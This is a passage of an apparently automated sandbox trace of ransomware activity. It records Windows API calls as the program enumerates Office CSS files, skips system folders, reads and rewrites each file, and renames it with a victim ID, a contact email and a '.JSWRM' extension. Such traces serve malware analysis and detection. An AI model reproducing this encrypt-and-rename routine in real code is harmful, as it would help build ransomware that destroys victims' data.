(in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240fe8 | out: hHeap=0x1e0000) returned 1 [0118.099] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cdf8 [0118.099] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23da70 | out: hHeap=0x1e0000) returned 1 [0118.099] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0118.099] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0118.099] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d9c8 [0118.099] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBFTSCM\\SCHEME46.CSS" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubftscm\\scheme46.css"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0118.100] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=130486) returned 1 [0118.100] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0118.100] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1fdb0) returned 0x24c1d0 [0118.100] ReadFile (in: hFile=0x314, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x1fdb0, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345e534*=0x1fdb0, lpOverlapped=0x0) returned 1 [0118.110] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0118.110] WriteFile (in: hFile=0x314, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x1fdb0, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345e530*=0x1fdb0, lpOverlapped=0x0) returned 1 [0118.111] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0118.111] CloseHandle (hObject=0x314) returned 1 [0118.111] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d530 [0118.111] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0118.111] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0118.111] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0118.111] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0118.111] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0118.111] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0118.111] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a210 [0118.111] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a210, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0118.111] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a210 | out: hHeap=0x1e0000) returned 1 [0118.111] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cd50 [0118.111] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247a88 [0118.111] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cd50 | out: hHeap=0x1e0000) returned 1 [0118.111] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0118.111] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBFTSCM\\SCHEME46.CSS" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubftscm\\scheme46.css"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBFTSCM\\SCHEME46.CSS.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubftscm\\scheme46.css.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0118.113] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247a88 | out: hHeap=0x1e0000) returned 1 [0118.113] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d530 | out: hHeap=0x1e0000) returned 1 [0118.113] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d9c8 | out: hHeap=0x1e0000) returned 1 [0118.113] FindNextFileW (in: hFindFile=0x232180, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xacf29e7, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xacf29e7, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xacf29e7, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x1f190, dwReserved0=0xfffffffe, dwReserved1=0x345e720, cFileName="SCHEME47.CSS", cAlternateFileName="")) returned 1 [0118.113] lstrcmpiW (lpString1="SCHEME47.CSS", lpString2=".") returned 1 [0118.113] lstrcmpiW (lpString1="SCHEME47.CSS", lpString2="..") returned 1 [0118.113] lstrcmpiW (lpString1="SCHEME47.CSS", lpString2="...") returned 1 [0118.113] lstrcmpiW (lpString1="SCHEME47.CSS", lpString2="windows") returned -1 [0118.113] lstrcmpiW (lpString1="SCHEME47.CSS", lpString2="recovery") returned 1 [0118.113] lstrcmpiW (lpString1="SCHEME47.CSS", lpString2="perflogs") returned 1 [0118.113] lstrcmpiW (lpString1="SCHEME47.CSS", lpString2="documents and settings") returned 1 [0118.113] lstrcmpiW (lpString1="SCHEME47.CSS", lpString2="$RECYCLE.BIN") returned 1 [0118.113] lstrcmpiW (lpString1="SCHEME47.CSS", lpString2="system volume information") returned -1 [0118.113] lstrcmpiW (lpString1="SCHEME47.CSS", lpString2="msocache") returned 1 [0118.113] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241218 [0118.113] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SCHEME47.CSS", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0118.113] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SCHEME47.CSS", cchWideChar=12, lpMultiByteStr=0x345e870, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SCHEME47.CSS", lpUsedDefaultChar=0x0) returned 12 [0118.113] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241218 | out: hHeap=0x1e0000) returned 1 [0118.113] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241218 [0118.113] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SCHEME47.CSS", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0118.113] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SCHEME47.CSS", cchWideChar=12, lpMultiByteStr=0x345e840, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SCHEME47.CSS", lpUsedDefaultChar=0x0) returned 12 [0118.113] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241218 | out: hHeap=0x1e0000) returned 1 [0118.113] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23da70 [0118.113] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cdf8 | out: hHeap=0x1e0000) returned 1 [0118.113] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0118.113] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0118.113] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cd50 [0118.113] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBFTSCM\\SCHEME47.CSS" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubftscm\\scheme47.css"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0118.115] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=127376) returned 1 [0118.115] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0118.115] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1f190) returned 0x24c1d0 [0118.115] ReadFile (in: hFile=0x314, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x1f190, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345e534*=0x1f190, lpOverlapped=0x0) returned 1 [0118.125] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0118.125] WriteFile (in: hFile=0x314, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x1f190, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345e530*=0x1f190, lpOverlapped=0x0) returned 1 [0118.125] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0118.125] CloseHandle (hObject=0x314) returned 1 [0118.125] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d7d0 [0118.125] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0118.125] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0118.125] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0118.125] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0118.125] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0118.125] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0118.125] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a3a8 [0118.125] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a3a8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0118.125] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a3a8 | out: hHeap=0x1e0000) returned 1 [0118.125] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cff0 [0118.126] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2476a8 [0118.126] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cff0 | out: hHeap=0x1e0000) returned 1 [0118.126] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0118.126] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBFTSCM\\SCHEME47.CSS" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubftscm\\scheme47.css"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBFTSCM\\SCHEME47.CSS.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubftscm\\scheme47.css.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0118.127] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2476a8 | out: hHeap=0x1e0000) returned 1 [0118.127] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d7d0 | out: hHeap=0x1e0000) returned 1 [0118.127] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cd50 | out: hHeap=0x1e0000) returned 1 [0118.127] FindNextFileW (in: hFindFile=0x232180, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xacf29e7, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xacf29e7, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xacf29e7, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x1f984, dwReserved0=0xfffffffe, dwReserved1=0x345e720, cFileName="SCHEME48.CSS", cAlternateFileName="")) returned 1 [0118.127] lstrcmpiW (lpString1="SCHEME48.CSS", lpString2=".") returned 1 [0118.127] lstrcmpiW (lpString1="SCHEME48.CSS", lpString2="..") returned 1 [0118.127] lstrcmpiW (lpString1="SCHEME48.CSS", lpString2="...") returned 1 [0118.127] lstrcmpiW (lpString1="SCHEME48.CSS", lpString2="windows") returned -1 [0118.127] lstrcmpiW (lpString1="SCHEME48.CSS", lpString2="recovery") returned 1 [0118.127] lstrcmpiW (lpString1="SCHEME48.CSS", lpString2="perflogs") returned 1 [0118.128] lstrcmpiW (lpString1="SCHEME48.CSS", lpString2="documents and settings") returned 1 [0118.128] lstrcmpiW (lpString1="SCHEME48.CSS", lpString2="$RECYCLE.BIN") returned 1 [0118.128] lstrcmpiW (lpString1="SCHEME48.CSS", lpString2="system volume information") returned -1 [0118.128] lstrcmpiW (lpString1="SCHEME48.CSS", lpString2="msocache") returned 1 [0118.128] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241308 [0118.128] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SCHEME48.CSS", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0118.128] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SCHEME48.CSS", cchWideChar=12, lpMultiByteStr=0x345e870, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SCHEME48.CSS", lpUsedDefaultChar=0x0) returned 12 [0118.128] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241308 | out: hHeap=0x1e0000) returned 1 [0118.128] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0118.128] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SCHEME48.CSS", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0118.128] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SCHEME48.CSS", cchWideChar=12, lpMultiByteStr=0x345e840, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SCHEME48.CSS", lpUsedDefaultChar=0x0) returned 12 [0118.128] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0118.128] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d878 [0118.128] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23da70 | out: hHeap=0x1e0000) returned 1 [0118.128] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0118.128] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0118.128] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23db18 [0118.128] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBFTSCM\\SCHEME48.CSS" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubftscm\\scheme48.css"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0118.129] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=129412) returned 1 [0118.129] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0118.129] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1f980) returned 0x24c1d0 [0118.129] ReadFile (in: hFile=0x314, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x1f980, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345e534*=0x1f980, lpOverlapped=0x0) returned 1 [0118.192] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0118.192] WriteFile (in: hFile=0x314, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x1f980, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345e530*=0x1f980, lpOverlapped=0x0) returned 1 [0118.193] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0118.193] CloseHandle (hObject=0x314) returned 1 [0118.193] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d338 [0118.193] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0118.193] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0118.193] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0118.193] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0118.193] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0118.193] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0118.193] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a360 [0118.193] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a360, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0118.193] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a360 | out: hHeap=0x1e0000) returned 1 [0118.193] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cdf8 [0118.193] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2476a8 [0118.193] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cdf8 | out: hHeap=0x1e0000) returned 1 [0118.193] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0118.193] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBFTSCM\\SCHEME48.CSS" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubftscm\\scheme48.css"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBFTSCM\\SCHEME48.CSS.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubftscm\\scheme48.css.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0118.194] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2476a8 | out: hHeap=0x1e0000) returned 1 [0118.194] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d338 | out: hHeap=0x1e0000) returned 1 [0118.194] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23db18 | out: hHeap=0x1e0000) returned 1 [0118.194] FindNextFileW (in: hFindFile=0x232180, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xacf29e7, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xacf29e7, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xacf29e7, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x1da6c, dwReserved0=0xfffffffe, dwReserved1=0x345e720, cFileName="SCHEME49.CSS", cAlternateFileName="")) returned 1 [0118.194] lstrcmpiW (lpString1="SCHEME49.CSS", lpString2=".") returned 1 [0118.194] lstrcmpiW (lpString1="SCHEME49.CSS", lpString2="..") returned 1 [0118.194] lstrcmpiW (lpString1="SCHEME49.CSS", lpString2="...") returned 1 [0118.194] lstrcmpiW (lpString1="SCHEME49.CSS", lpString2="windows") returned -1 [0118.194] lstrcmpiW (lpString1="SCHEME49.CSS", lpString2="recovery") returned 1 [0118.194] lstrcmpiW (lpString1="SCHEME49.CSS", lpString2="perflogs") returned 1 [0118.194] lstrcmpiW (lpString1="SCHEME49.CSS", lpString2="documents and settings") returned 1 [0118.195] lstrcmpiW (lpString1="SCHEME49.CSS", lpString2="$RECYCLE.BIN") returned 1 [0118.195] lstrcmpiW (lpString1="SCHEME49.CSS", lpString2="system volume information") returned -1 [0118.195] lstrcmpiW (lpString1="SCHEME49.CSS", lpString2="msocache") returned 1 [0118.195] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241330 [0118.195] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SCHEME49.CSS", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0118.195] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SCHEME49.CSS", cchWideChar=12, lpMultiByteStr=0x345e870, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SCHEME49.CSS", lpUsedDefaultChar=0x0) returned 12 [0118.195] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241330 | out: hHeap=0x1e0000) returned 1 [0118.195] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2413a8 [0118.195] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SCHEME49.CSS", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0118.195] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SCHEME49.CSS", cchWideChar=12, lpMultiByteStr=0x345e840, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SCHEME49.CSS", lpUsedDefaultChar=0x0) returned 12 [0118.195] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2413a8 | out: hHeap=0x1e0000) returned 1 [0118.195] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cca8 [0118.195] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d878 | out: hHeap=0x1e0000) returned 1 [0118.195] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0118.195] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0118.195] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d7d0 [0118.195] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBFTSCM\\SCHEME49.CSS" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubftscm\\scheme49.css"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0118.196] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=121452) returned 1 [0118.196] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0118.196] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1da60) returned 0x24c1d0 [0118.196] ReadFile (in: hFile=0x314, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x1da60, lpNumberOfBytesRead=0x345e534, 